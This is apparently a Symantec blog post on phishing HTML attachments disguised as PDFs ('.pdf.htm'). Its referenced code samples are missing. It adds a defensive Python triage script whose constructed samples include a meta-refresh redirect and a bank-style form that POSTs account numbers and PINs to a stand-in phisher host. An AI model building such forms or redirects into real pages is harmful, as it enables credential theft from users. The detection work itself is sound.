In the past, we monitored attacks with a similar type of file attachment, but they contained straightforward redirection code. There are different ways to redirect users to the desired location. One of the simpler HTML snippets for redirection is shown below:
Sample image of the message:
When the user opens the attachment, the redirection code is executed, opening the phishing site. However, this approach has some limitations: even though the phishing link stays hidden in the attachment, once the file is opened in a web browser, various anti-fraud tools may catch the redirect and block it.
Contents of the attached HTML file (URL encoded):
Contents of the attached HTML file (decoded):
This file is opened as a “local” HTML file, as shown below:
The address shown in the browser will look similar to the examples given below. These paths vary with the user's settings and operating system:
1. If the file is saved on the desktop:
2. If the file is opened directly:
As shown above in the message snapshot, the user is encouraged to open the attachment. The name of the attached file can be another point of confusion for the user. Some examples of the filenames include:
Account reset form.pdf.htm
Bank-Account confirmation form.pdf.htm
Today, most banks send their account statements in PDF format. Users may think that the attached file is a PDF and subsequently be tricked into opening an HTML file.
In addition, the HTML page shown above imitates an authentic bank home page, so users may be tricked into entering their bank information (credit card number or bank account details). This data is collected and sent to the phisher's server with an HTTP POST request. Currently this attack is limited to phishing, but the tactic may easily be used for other malicious activities as well.
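The three traits described above (a percent-encoded HTML body that hides a redirect, a double extension such as `.pdf.htm`, and a local form that POSTs banking details to a remote host) are all checkable at the mail gateway before the attachment ever reaches a browser. The following triage script is an added example written for this post; it is not Symantec's tooling, and the sample attachments, host names (`example.invalid`, `phisher.example.invalid`) and filenames it uses are constructed for illustration.

```python
"""Triage an e-mail HTML attachment for the redirect / credential-form
patterns described in the post (added example, not Symantec's tooling)."""
import re
from html.parser import HTMLParser
from urllib.parse import quote, unquote, urlparse

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")
HTML_EXTS = (".htm", ".html")
# input names that suggest a banking / credential form (heuristic list)
SENSITIVE_NAMES = ("password", "pass", "pin", "card", "cvv", "account", "ssn")
# window.location = ..., location.href = ..., location.replace(...) etc.
JS_REDIRECT = re.compile(r"\blocation\s*(?:\.\s*(?:href|replace|assign))?\s*(?:=(?!=)|\()")


def is_double_extension(filename: str) -> bool:
    """True for names like 'Account reset form.pdf.htm'."""
    name = filename.lower()
    if not name.endswith(HTML_EXTS):
        return False
    stem = name.rsplit(".", 1)[0]          # strip the real (.htm) extension
    return stem.endswith(DOC_EXTS)          # is a document extension left over?


def decode_layers(content: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding, repeatedly, until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(content)
        if decoded == content:
            break
        content = decoded
    return content


class _Collector(HTMLParser):
    """Collects meta refreshes, forms, inputs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.meta_refresh_urls, self.forms, self.inputs, self.scripts = [], [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}    # parser already lowercases names
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(\S+)", a.get("content", ""), re.I)
            if m:
                self.meta_refresh_urls.append(m.group(1).strip("'\""))
        elif tag == "form":
            self.forms.append((a.get("method", "get").lower(), a.get("action", "")))
        elif tag == "input":
            self.inputs.append((a.get("type", "text").lower(), a.get("name", "").lower()))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def triage(filename: str, raw: bytes) -> dict:
    """Return the findings for one attachment and a suspicious/clean verdict."""
    original = raw.decode("utf-8", "replace")
    text = decode_layers(original)
    p = _Collector()
    p.feed(text)
    findings = []
    if is_double_extension(filename):
        findings.append("double-extension filename")
    if text != original:
        findings.append("percent-encoded payload")
    remote_meta = [u for u in p.meta_refresh_urls if urlparse(u).scheme in ("http", "https")]
    if remote_meta or any(JS_REDIRECT.search(s) for s in p.scripts):
        findings.append("redirect to remote site")
    for method, action in p.forms:
        if method == "post" and urlparse(action).scheme in ("http", "https"):
            findings.append("form posts to remote host: " + urlparse(action).netloc)
    if any(t == "password" or any(k in n for k in SENSITIVE_NAMES) for t, n in p.inputs):
        findings.append("credential/banking input fields")
    return {"filename": filename, "findings": findings,
            "verdict": "suspicious" if findings else "clean"}


# --- constructed samples (not real phishing kits) ---------------------------
REDIRECT_HTML = ('<html><head><meta http-equiv="refresh" '
                 'content="0; url=http://example.invalid/login"></head></html>')
SAMPLE_REDIRECT = quote(REDIRECT_HTML, safe="").encode()      # percent-encoded attachment
SAMPLE_FORM = (b'<html><body><form method="POST" action="http://phisher.example.invalid/collect.php">'
               b'<input type="text" name="account_number"><input type="password" name="pin">'
               b'<input type="submit"></form><script>setTimeout(function(){'
               b' window.location.href = "http://example.invalid/"; }, 3000);</script></body></html>')
SAMPLE_BENIGN = (b'<html><body><h1>Newsletter</h1><form method="get" action="/search">'
                 b'<input type="text" name="q"></form></body></html>')

if __name__ == "__main__":
    for name, data in [("Account reset form.pdf.htm", SAMPLE_REDIRECT),
                       ("Bank-Account confirmation form.pdf.htm", SAMPLE_FORM),
                       ("newsletter.html", SAMPLE_BENIGN)]:
        print(triage(name, data))
```

The checks are deliberately independent: a single hit (for example only the double extension) is enough to quarantine for review, while the combination of a remote POST target plus password or account fields is what distinguishes the credential-harvesting page from a harmless locally-saved form.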
Symantec is continuously monitoring this trend and advises users to be cautious when opening attachments of the HTML file type, especially when they have arrived from an unknown source.